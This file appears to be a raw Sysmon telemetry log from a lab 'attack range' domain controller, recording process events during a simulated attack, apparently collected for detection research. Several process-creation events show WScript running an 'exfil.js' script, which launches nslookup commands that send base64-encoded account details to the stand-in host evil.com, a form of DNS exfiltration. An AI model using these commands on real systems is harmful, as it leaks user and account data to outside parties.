14:16:14.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.969{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-A13E-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.969{2E1864BB-17AE-629A-9F3E-000000005F02}58844348C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-A13E-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.975{2E1864BB-17AE-629A-A13E-000000005F02}3396C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AE-629A-9F3E-000000005F02}5884C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwcsbp.tmp 2>&1 10341000x8000000000000000196199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.918{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-A03E-000000005F02}2132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.918{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-A03E-000000005F02}2132C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.900{2E1864BB-17AE-629A-A03E-000000005F02}21323236C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-9F3E-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.884{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-A03E-000000005F02}2132C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.884{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-9F3E-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.884{2E1864BB-17A1-629A-783D-000000005F02}55522632C:\Windows\System32\WScript.exe{2E1864BB-17AE-629A-9F3E-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.887{2E1864BB-17AE-629A-9F3E-000000005F02}5884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwcsbp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.868{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfawx.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.800{2E1864BB-17AE-629A-9D3E-000000005F02}7456488C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-9E3E-000000005F02}8072C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.800{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.784{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-9E3E-000000005F02}8072C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.784{2E1864BB-17AE-629A-9C3E-000000005F02}77843292C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-9E3E-000000005F02}8072C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.798{2E1864BB-17AE-629A-9E3E-000000005F02}8072C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AE-629A-9C3E-000000005F02}7784C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfawx.tmp 2>&1 10341000x8000000000000000196179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.768{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-9D3E-000000005F02}7456C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.768{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-9D3E-000000005F02}7456C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.753{2E1864BB-17AE-629A-9D3E-000000005F02}7456488C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-9C3E-000000005F02}7784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.737{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-9D3E-000000005F02}7456C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\nt